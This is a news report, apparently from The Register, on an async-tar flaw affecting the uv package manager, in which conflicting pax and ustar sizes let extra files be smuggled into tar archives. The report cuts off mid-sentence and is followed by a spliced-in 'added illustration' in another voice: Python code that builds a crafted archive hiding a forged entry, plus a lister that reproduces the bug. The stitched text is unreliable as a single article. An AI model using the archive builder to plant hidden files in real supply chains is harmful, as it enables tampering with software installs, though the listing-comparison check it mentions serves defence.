A vulnerability in the popular Rust crate async-tar has affected the fast uv Python package manager, which uses a forked version that is now patched, but the most widely downloaded version of the crate remains unfixed.
The vulnerability is an error in the header-parsing code that allows an attacker to hide additional files in a tar archive. It was discovered by a team at secure computing company Edera.
The tar format supports both ustar (Unix Standard TAR) headers and pax headers; the latter were added as an extension to tar decades ago. When a file entry has both a ustar and a pax header, the code advances the stream position based on the ustar size, which is often zero, rather than the pax size, which should override it. The parser can therefore land inside the file's content and interpret it as the next tar header, enabling smuggled files. Edera stated that th
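To make the bug concrete, here is an added illustration (not code from async-tar, uv or Edera): a minimal tar lister over a constructed archive whose one real entry carries its true size only in a pax record, with its content crafted to begin with a valid-looking header. Listing with the ustar size for the advance (the bug) reports a second entry that the pax-aware listing does not; entry names and data are constructed for the example.

```python
BLOCK = 512
def padded(n):
    return n + (-n % BLOCK)          # round up to the next 512-byte block

def make_header(name, size, typeflag):
    """ustar header with a valid checksum; size is the 11-digit octal ustar field."""
    hdr = bytearray(BLOCK)
    hdr[0:len(name)] = name
    hdr[100:124] = b"0000644\0" + b"0000000\0" * 2          # mode, uid, gid
    hdr[124:148] = b"%011o\0" % size + b"00000000000\0"      # size, mtime
    hdr[148:156], hdr[156:157] = b"        ", typeflag      # checksum computed over blanks
    hdr[257:265] = b"ustar\0" + b"00"                        # magic + version
    hdr[148:156] = b"%06o\0 " % sum(hdr)
    return bytes(hdr)

def pax_record(key, value):
    """'<len> key=value\\n', where len counts the whole record including itself."""
    body, n = f" {key}={value}\n", 0
    while n != len(str(n)) + len(body):
        n = len(str(n)) + len(body)
    return f"{n}{body}".encode()

def build_archive(real_name, hidden_name, hidden_data):
    """One real entry whose data is a forged header + payload; its true size lives only in pax."""
    data = make_header(hidden_name, len(hidden_data), b"0") + hidden_data.ljust(padded(len(hidden_data)), b"\0")
    pax = pax_record("size", len(data))
    blob = make_header(b"PaxHeaders/entry", len(pax), b"x") + pax.ljust(padded(len(pax)), b"\0")
    blob += make_header(real_name, 0, b"0")              # ustar size 0; pax must override it
    return blob + data + b"\0" * (2 * BLOCK)             # two zero blocks end the archive

def list_entries(blob, honor_pax_size):
    """Return [(name, size)]. honor_pax_size=False advances by the ustar size, i.e. the bug."""
    pos, pax, entries = 0, {}, []
    while pos + BLOCK <= len(blob):
        hdr, pos = blob[pos:pos + BLOCK], pos + BLOCK
        if hdr == b"\0" * BLOCK:
            break
        if int(hdr[148:154], 8) != sum(hdr[:148]) + sum(hdr[156:]) + 8 * 32:
            raise ValueError("bad header checksum")
        name = hdr[:100].rstrip(b"\0").decode()
        ustar_size = int(hdr[124:136].rstrip(b"\0 "), 8)
        if hdr[156:157] == b"x":                          # pax extended header: collect records
            for rec in blob[pos:pos + ustar_size].decode().splitlines():
                k, v = rec.split(" ", 1)[1].split("=", 1)
                pax[k] = v
            pos += padded(ustar_size)
            continue
        size, pax = int(pax.get("size", ustar_size)), {}   # pax size overrides the ustar field
        entries.append((name, size))
        pos += padded(size if honor_pax_size else ustar_size)  # bug: skips 0 bytes, lands on forged header
    return entries
```

A defensive check a consumer can run is to list an archive both ways and reject it when the two listings differ.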

The Register